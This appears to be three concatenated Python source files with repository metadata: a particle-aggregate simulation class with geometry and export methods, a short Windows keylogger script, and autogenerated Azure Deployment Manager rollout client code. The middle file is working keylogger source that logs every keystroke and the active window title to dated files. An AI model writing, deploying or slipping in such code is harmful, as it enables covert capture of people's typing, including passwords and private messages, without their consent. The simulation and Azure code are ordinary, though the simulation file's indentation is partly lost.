                ids, dist = self.line_sphere(pos, direction, closest=True, ret_dist=True)
                if dist is not None:
                    # Track the closest intersect over all aggregate monomers.
                    if dist < max_dist:
                        max_dist = dist
                        monomer_pos = pos
                        sim_id = ids # id of the simulation agg
            if sim_id is not None:
                hit = monomer_pos + max_dist * direction # position of closest intersect
                return sim_id, max_dist, hit
            else:
                # No monomer of the aggregate hits anything.
                return None, None, None
        else:
            # Single monomer: delegate directly.
            ids, hits = self.line_sphere(position, direction, closest=closest, ret_dist=False)
            return ids, hits
    def line_sphere(self, position, direction, closest=True, ret_dist=False):
        """
        Accepts a position and direction vector defining a line and determines which
        particles in the simulation intersect this line, and the locations of these
        intersections. If closest=True only the shortest (closest) intersect is
        returned, otherwise all values are given.
        If ret_dist=True then the distance from position to the hit will be returned,
        rather than the coordinates of the hit itself.
        See, for example, https://en.wikipedia.org/wiki/Line%E2%80%93sphere_intersection

        NOTE(review): the algebra assumes direction is a unit vector, and
        returned distances can be negative when a sphere lies behind the
        origin along the line - confirm callers handle both.
        """
        # calculate the discriminator using numpy arrays
        # (vectorised over all self.count particles at once)
        vector = position - self.pos[0:self.count]
        b = np.sum(vector * direction, 1)
        c = np.sum(np.square(vector), 1) - self.radius[0:self.count] * self.radius[0:self.count]
        disc = b * b - c
        # disc<0 when no intersect, so ignore those cases
        possible = np.where(disc >= 0.0)
        # complete the calculation for the remaining points
        disc = disc[possible]
        ids = self.id[possible]
        if len(disc)==0:
            # Nothing intersects the line at all.
            return None, None
        b = b[possible]
        # two solutions: -b/2 +/- sqrt(disc) - this solves for the distance along the line
        dist1 = -b - np.sqrt(disc)
        dist2 = -b + np.sqrt(disc)
        # Take the nearer of the two intersection points on each sphere.
        dist = np.minimum(dist1, dist2)
        # choose the minimum distance and calculate the absolute position of the hit
        hits = position + dist[:,np.newaxis] * direction
        if closest:
            if ret_dist:
                return ids[np.argmin(dist)], dist[np.argmin(dist)]
            else:
                return ids[np.argmin(dist)], hits[np.argmin(dist)]
        else:
            if ret_dist:
                return ids, dist
            else:
                return ids, hits
def check(self, pos, radius):
"""
Accepts a proposed particle position and radius and checks if this overlaps with any
particle currently in the domain. Returns True if the position is acceptable or
False if not.
"""
if len(pos.shape)==2: # passed an aggregate
if cdist(pos, self.pos[0:self.count]).min() < (radius.max() + self.radius[0:self.count].max()) > 0:
# TODO does not properly deal with polydisperse systems
if self.debug: print('Cannot add aggregate here!')
return False
else:
return True
else:
if (cdist(np.array([pos]), self.pos[0:self.count+1])[0] < (radius + self.radius[0:self.count+1].max())).sum() > 0:
if self.debug: print('Cannot add particle here!')
return False
else:
return True
def farthest(self):
"""
Returns the centre of the particle farthest from the origin
"""
return self.pos.max()
def com(self):
"""
Computes the centre of mass
"""
return np.average(self.pos[:self.count], axis=0, weights=self.mass[:self.count])
def recentre(self):
"""
Re-centres the simulation such that the centre-of-mass of the assembly
is located at the origin (0,0,0)
"""
self.pos -= self.com()
def move(self, vector):
"""Move all particles in the simulation by the given vector"""
self.pos += vector
def gyration(self):
"""
Returns the radius of gyration: the RMS of the monomer distances from the
centre of mass of the aggregate.
"""
return np.sqrt(np.square(self.pos[:self.count]-self.com()).sum()/self.count)
def char_rad(self):
"""
Calculates the characteristic radius: a_c = sqrt(5/3) * R_g
"""
return np.sqrt(5./3.) * self.gyration()
def porosity_gyro(self):
"""
Calculates porosity as 1 - vol / vol_gyration
"""
return (1. - ( (self.volume[:self.count].sum()) / ((4./3.)*np.pi*self.gyration()**3.) ) )
def porosity_chull(self):
return (1. - ( (self.volume[:self.count].sum()) / self.chull().volume ) )
def density_gyro(self):
"""
Calculates density as (mass of monomers)/(volume of gyration)
"""
return (self.mass[:self.count].sum() / ((4./3.)*np.pi*self.gyration()**3.) )
def density_chull(self):
return (self.mass[:self.count].sum() / self.chull().volume)
    def fractal_scaling(self, prefactor=1.27):
        """Calculates the fractal dimension according to the scaling relation:
        N = k * (Rg/a)**Df
        The value of k, the fractal pre-factor, can be set with prefactor=

        NOTE(review): the monomer radius a is taken as the MINIMUM radius in
        the domain - for polydisperse systems confirm this is the intended
        choice (a mean radius is also common).
        """
        # Solve N = k*(Rg/a)**Df for Df via logarithms.
        return np.log(self.count/prefactor)/np.log(self.gyration()/self.radius[0:self.count].min())
def fractal_mass_radius(self, num_pts=100, show=False):
"""
Calculate the fractal dimension of the domain using the relation:
m(r) prop. r**D_m
"""
r = np.linalg.norm(self.pos, axis=1)
start = self.radius.min()
stop = (self.farthest()+self.radius.max())*.8
step = (stop-start)/float(num_pts)
radii = np.arange(start, stop, step)
count = np.zeros(len(radii))
# TODO - implement sphere-sphere intersection and correctly calculate
# contribution from spheres at the boundary of the ROI.
for idx, i in enumerate(radii):
count[idx] = r[r<=i].size
# Need to fit up until the curve is influenced by the outer edge
coeffs = np.polyfit(np.log(radii),np.log(count),1)
poly = np.poly1d(coeffs)
if show:
fig, ax = plt.subplots()
ax.loglog(radii, count)
ax.grid(True)
ax.set_xlabel('radius')
ax.set_ylabel('count')
yfit = lambda x: np.exp(poly(np.log(radii)))
ax.loglog(radii, yfit(radii))
plt.show()
return coeffs[0]
    def fractal_box_count(self, num_grids=100):
        """
        Calculate the fractal dimension of the domain using the cube-counting method.

        NOTE(review): this method is an UNFINISHED STUB - it computes grid
        parameters but performs no counting and implicitly returns None.
        The num_grids argument is currently unused.
        """
        # need to determine if a square contains any of a sphere...
        # first use a bounding box method to filter the domain
        (xmin, xmax), (ymin, ymax), (zmin, zmax) = self.get_bb()
        # need to determine minimum and maximum box sizes, and the increments
        # to use when slicing the domain
        r_min = self.radius.min()
        # Maximum number of divisions per axis so that a cell is no smaller
        # than the smallest particle radius (currently unused below).
        max_div_x = int(np.ceil((xmax-xmin) / r_min))
        max_div_y = int(np.ceil((ymax-ymin) / r_min))
        max_div_z = int(np.ceil((zmax-zmin) / r_min))
        # calculate:
        # Df = Log(# cubes covering object) / log( 1/ box size)
        # pseudo-code from http://paulbourke.net/fractals/cubecount/
        # for all offsets
        #    for all box sizes s
        #        N(s) = 0
        #        for all box positions
        #            for all voxels inside the current box
        #                if the voxel is part of the object
        #                    N(s) = N(s) + 1
        #                    stop searching voxels in the current box
        #                end
        #            end
        #        end
        #    end
        # end
    def to_xyz(self, filename, extended=False):
        """
        Writes monomer positions to a file using the simple XYZ format as here:
        https://en.wikipedia.org/wiki/XYZ_file_format
        If extended=True then the extended XYZ format is written:
        https://libatoms.github.io/QUIP/io.html#module-ase.io.extxyz
        (including radius, density etc.)

        NOTE(review): len(self.pos) is the pre-allocated array length, not
        self.count, so unused zero rows are written too - confirm intended.
        """
        if not extended:
            # <number of atoms>
            # comment line
            # <element> <X> <Y> <Z>
            # ...
            headertxt = '%d\n%s' % (len(self.pos), filename)
            np.savetxt(filename, self.pos, delimiter=" ", header=headertxt, comments='')
        else:
            # <number of atoms>
            # format definition
            # <element> <X> <Y> <Z>
            # ...
            # format must contain Lattice and Properties
            # Lattice="5.44 0.0 0.0 0.0 5.44 0.0 0.0 0.0 5.44" Properties=species:S:1:pos:R:3 Time=0.0
            # Columns written: id, x, y, z, radius.
            headertxt = '%d\n%s' % (len(self.pos), filename)
            np.savetxt(filename, np.hstack( (self.id[:,np.newaxis], self.pos, self.radius[:,np.newaxis])) ,
                delimiter=" ", header=headertxt, comments='')
            # TODO: add formatted header and fmt statement to savetxt
        return
def to_csv(self, filename):
"""
Write key simulation variables (id, position and radius) to a CSV file
"""
headertxt = 'id, x, y, z, radius'
np.savetxt(filename, np.hstack( (self.id[:,np.newaxis], self.pos, self.radius[:,np.newaxis]) ),
delimiter=",", header=headertxt)
return
def from_csv(self, filename, density=None):
"""
Initialise simulation based on a file containing particle ID, position and radius.
Note that particles with the same ID will be treated as members of an aggregate.
"""
simdata = np.genfromtxt(filename, comments='#', delimiter=',')
self.id = simdata[:,0].astype(np.int)
self.pos = simdata[:,1:4]
self.radius = simdata[:,4]
if density is None:
self.density = simdata[:,5]
else:
self.density = np.ones_like(self.id, dtype=float)
self.volume = (4./3.)*np.pi*self.radius**3.
self.mass = self.volume * self.density
self.count = len(self.id)
self.next_id = self.id.max()+1
self.agg_count = len(np.unique(self.id))
return
    def to_vtk(self, filename):
        """
        Writes the simulation domain to a VTK file. Note that evtk is required!

        Each particle becomes a VTK point carrying id, radius and mass
        attributes.
        """
        from evtk.hl import pointsToVTK
        # x = np.ascontiguousarray(self.pos[:,0])
        # y = np.ascontiguousarray(self.pos[:,1])
        # z = np.ascontiguousarray(self.pos[:,2])
        # evtk requires contiguous 1D arrays; column slices of pos are
        # strided views, hence the explicit copies here.
        x = np.asfortranarray(self.pos[:,0])
        y = np.asfortranarray(self.pos[:,1])
        z = np.asfortranarray(self.pos[:,2])
        radius = np.asfortranarray(self.radius)
        mass = np.asfortranarray(self.mass)
        id = np.asfortranarray(self.id)
        pointsToVTK(filename, x, y, z,
            data = {"id" : id, "radius" : radius, "mass": mass})
        return
def to_liggghts(self, filename, density=100., num_types=2):
"""
Write to a LIGGGHTS data file, suitable to be read into a simulation.
"""
# Save to a LAMMPS/LIGGGHTS data file, compatible with the read_data function
#
# Output format needs to be:
# 42 atoms
#
# 1 atom types
#
# -0.155000000000000 0.155000000000000 xlo xhi
# -0.155000000000000 0.155000000000000 ylo yhi
# -0.150000000000000 1.200000000000000 zlo zhi
#
# Atoms
#
# 1 1 0.01952820 0.14099100 1.10066000 0.01073252 1000.0 1
# 2 1 0.01811800 0.14345470 1.10433955 0.00536626 1000.0 1
#
# atom-ID atom-type x y z diameter density molecule-ID
#
# etc.
basedir, fname = os.path.split(filename)
if fname.lower()[0:6] != 'data.':
fname = 'data.' + fname
filename = os.path.join(basedir, fname)
liggghts_file = open(filename, 'w')
liggghts_file.write('# LAMMPS data file\n\n')
# Make sure that we shift the particles above the Z axis, so that we can
# always set a floor at z=0 in LIGGGHTS!
if self.pos[:,2].min() < 0:
offset = abs(self.pos[:,2].min()) + 2.*self.radius.max()
else:
offset = 0.
# TODO: update for aggregates once that code is in place
liggghts_file.write(str(self.count) + ' atoms \n\n')
liggghts_file.write('%d atom types\n\n' % num_types)
(xmin, xmax), (ymin, ymax), (zmin, zmax) = self.get_bb()
zmin += offset
zmax += offset
liggghts_file.write(str(xmin) + ' ' + str(xmax) + ' xlo xhi\n')
liggghts_file.write(str(ymin) + ' ' + str(ymax) + ' ylo yhi\n')
liggghts_file.write(str(zmin) + ' ' + str(zmax) + ' zlo zhi\n\n')
liggghts_file.write('Atoms\n\n')
for idx in range(self.count):
liggghts_file.write(str(self.id[idx]+1) + ' ' + str(1) + ' ' + str(2.*self.radius[idx]) + ' ' +
str(density) + ' ' + str(self.pos[idx,0]) + ' ' + str(self.pos[idx,1]) + ' ' + str(self.pos[idx,2]+offset) + '\n')
liggghts_file.close()
return
    def projection(self, xpix=512, ypix=512, vector=None, show=False, png=None):
        """
        Produces a binary projection of the simulation with the number of
        pixels specified by xpix and ypix along the direction given by
        vector.
        If png= is set to a filename, a 2D graphic will be output.
        If show=True the image will be displayed.
        """
        binary_image = np.zeros( (xpix,ypix), dtype=bool )
        # Half-extent of the image plane: beyond the farthest particle plus
        # a margin of twice the largest radius.
        farthest = self.farthest() + 2.*self.radius.max()
        xs = np.linspace(-farthest, farthest, xpix)
        ys = np.linspace(-farthest, farthest, ypix)
        # TODO select out points that are in proxity to pixel projection
        # TODO: rotate points (about origin) such that the normal of the plane
        # matches vector
        if vector is not None:
            # Temporarily rotate the particle positions so the projection
            # axis (+z) aligns with the requested view vector; restored below.
            R = R_2vect( [0,0,1], vector)
            old_pos = self.pos
            self.pos = np.dot(self.pos, R)
        # Cast one ray per pixel, looking down -z from above the domain.
        for y_idx in range(ypix):
            for x_idx in range(xpix):
                pcle_id, intersect = self.intersect( (xs[x_idx], ys[y_idx], farthest), [0,0,-1], closest=True )
                if intersect is not None:
                    binary_image[y_idx,x_idx] = True
        if png is not None or show:
            import matplotlib.pyplot as plt
            fig, ax = plt.subplots()
            ax.imshow(binary_image, cmap=plt.cm.binary, extent=[-farthest, farthest, -farthest, farthest])
            if png is not None:
                fig.savefig(png)
            if show:
                plt.show()
        if vector is not None:
            # Restore the unrotated positions.
            self.pos = old_pos
        return binary_image
    def to_afm(self, xpix=256, ypix=256):
        """
        Assuming an infinitely sharp tip, this routine samples the simulation domain
        (up to the bounding box) at regular points in the XY plane, defined by the
        number of x and y pixels given by xpix and ypix.
        A 2D height field is returned which gives a simulated AFM image at the given
        resolution. Note that the 'substrate' is assumed simply to be the lowest
        point in the aggregate and values with no particle will be set to zero there."""
        # NOTE(review): np.float was removed in NumPy>=1.24 - the builtin
        # float is the equivalent dtype.
        afm_image = np.zeros( (xpix,ypix), dtype=np.float )
        (xmin, xmax), (ymin, ymax), (zmin, zmax) = self.get_bb()
        # Rays start above the highest particle top.
        height = zmax + self.radius.max()
        xs = np.linspace(xmin, xmax, xpix)
        ys = np.linspace(ymin, ymax, ypix)
        # Cast one vertical ray (-z) per pixel and record the first hit height.
        for y_idx in range(ypix):
            for x_idx in range(xpix):
                pcle_id, intersect = self.intersect( (xs[x_idx], ys[y_idx], height), (0.,0.,-1.), closest=True )
                if intersect is None:
                    # No particle under this pixel: use the substrate height.
                    afm_image[y_idx,x_idx] = zmin
                else:
                    afm_image[y_idx,x_idx] = intersect[2]
        # Normalise so the lowest point sits at zero.
        afm_image -= afm_image.min()
        return afm_image
def to_gsf(self, filename, xpix=256, ypix=256):
"""
Generates an AFM height field using to_afm() and writes to a Gwyddion simple
field file (.gsf). The full file description can be found at:
http://gwyddion.net/documentation/user-guide-en/gsf.html
"""
import os, struct
(xmin, xmax), (ymin, ymax), (zmin, zmax) = self.get_bb()
afm_image = self.to_afm(xpix=xpix, ypix=ypix)
if os.path.splitext(filename) != '.gsf':
filename += '.gsf'
gsf_file = open(filename, 'w')
gsf_file.write('Gwyddion Simple Field 1.0\n')
gsf_file.write('XRes = %d\n' % xpix)
gsf_file.write('YRes = %d\n' % ypix)
gsf_file.write('XReal = %5.3f\n' % (xmax-xmin))
gsf_file.write('YReal = %5.3f\n' % (ymax-ymin))
gsf_file.close()
# pad to the nearest 4-byte boundary with NULLs
filesize = os.path.getsize(filename)
padding = filesize % 4
pad = struct.Struct('%dx' % padding)
gsf_file = open(filename, 'ab')
gsf_file.write(pad.pack())
# Data values are stored as IEEE 32bit single-precision floating point numbers,
# in little-endian (LSB, or Intel) byte order. Values are stored by row, from top to bottom,
# and in each row from left to right.
s = struct.pack('<%df' % (xpix*ypix), *np.ravel(afm_image).tolist())
gsf_file.write(s)
gsf_file.close()
return
def rotate(self, direction, angle):
"""
Rotates the entire simulation (typically an aggregate centred on
the origin) about the origin. Usually this is used to provide a
random orientation. Inputs are a direction (vector) and an angle
(in degrees).
A rotation matrix will be calculated between the specified axis and the
given vector, and this will be applied to the particles in the simulation.
"""
# Rotation matrix code from here:
# https://mail.scipy.org/pipermail/numpy-discussion/2009-March/040806.html
d = np.array(direction, dtype=np.float64)
d /= np.linalg.norm(d)
angle = np.radians(angle)
eye = np.eye(3, dtype=np.float64)
ddt = np.outer(d, d)
skew = np.array( [[ 0, d[2], -d[1]],
[-d[2], 0, d[0]],
[ d[1], -d[0], 0]], dtype=np.float64)
R = ddt + np.cos(angle) * (eye - ddt) + np.sin(angle) * skew
print R
self.pos = np.dot(self.pos, R)
return
def R_2vect(vector_orig, vector_fin):
    """Calculate the rotation matrix required to rotate from one vector to another.

    The axis-angle convention is used: the rotation axis is the (normalised)
    cross product of the two vectors and the rotation angle is the arccosine
    of the dot product of the two unit vectors. The returned 3x3 matrix R
    satisfies R.dot(unit(vector_orig)) == unit(vector_fin).

    @param vector_orig: The unrotated vector defined in the reference frame.
    @type vector_orig:  numpy array, len 3
    @param vector_fin:  The rotated vector defined in the reference frame.
    @type vector_fin:   numpy array, len 3
    As here: http://svn.gna.org/svn/relax/tags/1.3.4/maths_fns/rotation_matrix.py
    """
    from numpy import cross, dot
    from numpy.linalg import norm
    from math import acos, cos, sin

    R = np.zeros( (3,3) )
    # Convert the vectors to unit vectors.
    vector_orig = vector_orig / norm(vector_orig)
    vector_fin = vector_fin / norm(vector_fin)
    # The rotation axis (normalised).
    axis = cross(vector_orig, vector_fin)
    axis_len = norm(axis)
    if axis_len != 0.0:
        axis = axis / axis_len
    else:
        # BUGFIX: parallel or anti-parallel vectors give a zero cross
        # product. The old code left the axis at zero, which for the
        # anti-parallel case produced -identity (det = -1, an improper
        # rotation). Handle both degenerate cases explicitly.
        if dot(vector_orig, vector_fin) > 0.0:
            return np.eye(3)  # already aligned - no rotation needed
        # Anti-parallel: rotate 180 deg about any axis perpendicular to
        # vector_orig (pick a helper axis not nearly parallel to it).
        helper = np.array([1.0, 0.0, 0.0])
        if abs(vector_orig[0]) > 0.9:
            helper = np.array([0.0, 1.0, 0.0])
        axis = cross(vector_orig, helper)
        axis = axis / norm(axis)
    # Alias the axis coordinates.
    x = axis[0]
    y = axis[1]
    z = axis[2]
    # The rotation angle - clamp the dot product against floating-point
    # drift outside [-1, 1], which would make acos raise ValueError.
    angle = acos(max(-1.0, min(1.0, dot(vector_orig, vector_fin))))
    # Trig functions (only need to do this maths once!).
    ca = cos(angle)
    sa = sin(angle)
    # Calculate the rotation matrix elements (axis-angle / Rodrigues form).
    R[0,0] = 1.0 + (1.0 - ca)*(x**2 - 1.0)
    R[0,1] = -z*sa + (1.0 - ca)*x*y
    R[0,2] = y*sa + (1.0 - ca)*x*z
    R[1,0] = z*sa+(1.0 - ca)*x*y
    R[1,1] = 1.0 + (1.0 - ca)*(y**2 - 1.0)
    R[1,2] = -x*sa+(1.0 - ca)*y*z
    R[2,0] = -y*sa+(1.0 - ca)*x*z
    R[2,1] = x*sa+(1.0 - ca)*y*z
    R[2,2] = 1.0 + (1.0 - ca)*(z**2 - 1.0)
    return R
def SqDistPointSegment(a, b, c):
    """Return the squared distance between point c and the line segment ab
    (all arguments are numpy 3-vectors)."""
    seg = b - a
    to_c = c - a
    # Projection of c onto the segment direction (unnormalised).
    proj = np.dot(to_c, seg)
    if proj <= 0.:
        # c projects before a: the closest point is a itself.
        return np.dot(to_c, to_c)
    seg_len2 = np.dot(seg, seg)
    if proj >= seg_len2:
        # c projects beyond b: the closest point is b itself.
        end_to_c = c - b
        return np.dot(end_to_c, end_to_c)
    # c projects onto the interior of ab: subtract the along-segment part.
    return np.dot(to_c, to_c) - proj * proj / seg_len2
def TestSphereCapsule(sphere_pos, sphere_r, cyl_start, cyl_end, cyl_r):
    """Return True if a sphere overlaps a capsule (a cylinder from cyl_start
    to cyl_end of radius cyl_r with hemispherical end caps), else False."""
    # They collide when the sphere centre lies within (sphere_r + cyl_r) of
    # the capsule's axis segment; compare squared quantities to avoid a sqrt.
    combined = sphere_r + cyl_r
    dist2 = SqDistPointSegment(cyl_start, cyl_end, sphere_pos)
    return bool(dist2 <= combined * combined)
| [
"mark@lunartech.org"
] | mark@lunartech.org |
ff5974705f143472c351bf8f4e3490095f6fc4f9 | cd10be27d55a22723a94025a8cc653fb0dec084d | /keylogger.pyw | ca647f5158eca584534df31558567825897a0c1c | [] | no_license | tedski999/python-scripts | a09dafa979ab0550d188a1fdc61984aa64c8688e | aeb283799108b482efa5d082083d0c325f7cb2a4 | refs/heads/master | 2022-12-04T02:48:16.558582 | 2020-08-21T17:06:20 | 2020-08-21T17:06:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 725 | pyw | from win32gui import GetWindowText, GetForegroundWindow
from pynput.keyboard import Listener
from datetime import datetime
from os import path
import logging
# Directory receiving the per-day log files.
# NOTE(review): the directory is never created - logging silently fails if
# .\logs\ does not already exist; confirm the caller prepares it.
logPath = ".\\logs\\"
# Title of the window that last had focus, so focus changes can be logged once.
lastFocusName = ""
def on_press(key):
    # Callback invoked by pynput for every key press: appends the key (and
    # the foreground window title whenever focus changes) to a dated log file.
    global lastFocusName
    filename = (str(datetime.now().date()) + ".txt")
    # NOTE(review): logging.basicConfig only takes effect on its FIRST call,
    # so the date-based filename never rolls over after midnight - the file
    # chosen at the first keypress is used for the whole session.
    logging.basicConfig(filename = path.join(logPath + filename), level = logging.DEBUG, format = "%(message)s")
    if lastFocusName != GetWindowText(GetForegroundWindow()):
        # Focus changed: record the new window title on its own line.
        logging.info("\n" + GetWindowText(GetForegroundWindow()))
        lastFocusName = GetWindowText(GetForegroundWindow())
    logging.info(str(datetime.now().time()) + ": " + str(key))
# Block forever, dispatching key events to on_press.
with Listener(on_press=on_press) as listener:
    listener.join()
| [
"tedjohnsonjs@gmail.com"
] | tedjohnsonjs@gmail.com |
6e6be05f168d51c04778758cfdbef7aef1c73390 | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/deploymentmanager/azure-mgmt-deploymentmanager/azure/mgmt/deploymentmanager/aio/operations/_rollouts_operations.py | 3e790f1835a9d269c5154a3a56505a1fc12ed757 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 23,787 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RolloutsOperations:
"""RolloutsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.deploymentmanager.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _create_or_update_initial(
self,
resource_group_name: str,
rollout_name: str,
rollout_request: Optional["_models.RolloutRequest"] = None,
**kwargs: Any
) -> "_models.RolloutRequest":
cls = kwargs.pop('cls', None) # type: ClsType["_models.RolloutRequest"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if rollout_request is not None:
body_content = self._serialize.body(rollout_request, 'RolloutRequest')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
response_headers = {}
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('RolloutRequest', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
rollout_name: str,
rollout_request: Optional["_models.RolloutRequest"] = None,
**kwargs: Any
) -> AsyncLROPoller["_models.RolloutRequest"]:
"""Creates or updates a rollout.
This is an asynchronous operation and can be polled to completion using the location header
returned by this operation.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param rollout_request: Source rollout request object that defines the rollout.
:type rollout_request: ~azure.mgmt.deploymentmanager.models.RolloutRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either RolloutRequest or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.deploymentmanager.models.RolloutRequest]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.RolloutRequest"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
rollout_name=rollout_name,
rollout_request=rollout_request,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
response_headers = {}
response = pipeline_response.http_response
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('RolloutRequest', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def get(
self,
resource_group_name: str,
rollout_name: str,
retry_attempt: Optional[int] = None,
**kwargs: Any
) -> "_models.Rollout":
"""Gets detailed information of a rollout.
Gets detailed information of a rollout.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param retry_attempt: Rollout retry attempt ordinal to get the result of. If not specified,
result of the latest attempt will be returned.
:type retry_attempt: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if retry_attempt is not None:
query_parameters['retryAttempt'] = self._serialize.query("retry_attempt", retry_attempt, 'int')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
